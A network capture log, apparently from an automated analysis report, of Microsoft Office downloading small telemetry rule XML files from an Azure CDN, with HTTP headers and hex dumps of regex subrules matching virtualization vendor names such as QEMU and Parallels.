                                            2024-11-18 20:16:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.44983013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:47 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:47 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:47 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                            ETag: "0x8DC582BB650C2EC"
                                            x-ms-request-id: 760e684f-301e-0000-24f8-36eecc000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201647Z-164f84587bflm48hhC1DFW0nf8000000031g00000000er81
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:47 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.44983113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:47 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:47 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:47 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3EAF226"
                                            x-ms-request-id: 9ba9b484-c01e-00ad-5d7f-37a2b9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201647Z-16547b76f7f64d6whC1DFWf9vn00000004s000000000wy6r
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:47 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.44983213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:47 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:47 UTC471INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:47 GMT
                                            Content-Type: text/xml
                                            Content-Length: 485
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                            ETag: "0x8DC582BB9769355"
                                            x-ms-request-id: 3f8cbb92-901e-005b-03f6-392005000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201647Z-1866b5c5fbbfrdddhC1DFW7e9000000002b000000000bpm2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_MISS
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:47 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.44983313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:47 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:47 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:47 GMT
                                            Content-Type: text/xml
                                            Content-Length: 411
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B989AF051"
                                            x-ms-request-id: 2bae05a1-901e-00a0-0ba2-376a6d000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201647Z-16547b76f7fjx5nrhC1DFW4dsc00000003g000000000ak4n
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:47 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.44983513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:48 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:48 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 470
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                            ETag: "0x8DC582BBB181F65"
                                            x-ms-request-id: 96c88eee-b01e-005c-317c-364c66000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201648Z-164f84587bfsqsthhC1DFWh63000000005eg000000006whv
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:48 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.44983613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:48 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:48 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                            ETag: "0x8DC582BB556A907"
                                            x-ms-request-id: f3ae074e-d01e-0082-62af-36e489000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201648Z-16547b76f7fsq6p7hC1DFWfx6800000004q000000000qzhs
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.44983713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:48 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:48 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 502
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB6A0D312"
                                            x-ms-request-id: dcb3d461-101e-000b-6d69-355e5c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201648Z-1866b5c5fbbfkdfghC1DFW4sv400000005hg0000000002gm
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:48 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.44983813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:48 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:48 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                            ETag: "0x8DC582B9D30478D"
                                            x-ms-request-id: 93022022-f01e-00aa-73a0-368521000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201648Z-164f84587bfn7ppchC1DFW45b400000000pg00000000fh60
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:48 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            88192.168.2.44983913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:48 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:48 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 474
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3F48DAE"
                                            x-ms-request-id: bb2e9763-101e-0079-2c7d-375913000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201648Z-164f84587bf6n6jwhC1DFW90fn00000005h000000000b8m3
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:48 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            89192.168.2.44984013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:49 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:49 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 408
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                            ETag: "0x8DC582BB9B6040B"
                                            x-ms-request-id: 0269dba3-501e-0035-248e-37c923000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201649Z-1866b5c5fbbr78bbhC1DFWqz2n00000006g000000000327w
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:49 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            90192.168.2.44984113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:49 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:49 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 469
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3CAEBB8"
                                            x-ms-request-id: 416d43dc-f01e-003f-18d2-37d19d000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201649Z-1866b5c5fbb7km9phC1DFWr2sc000000056g000000008ae3
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
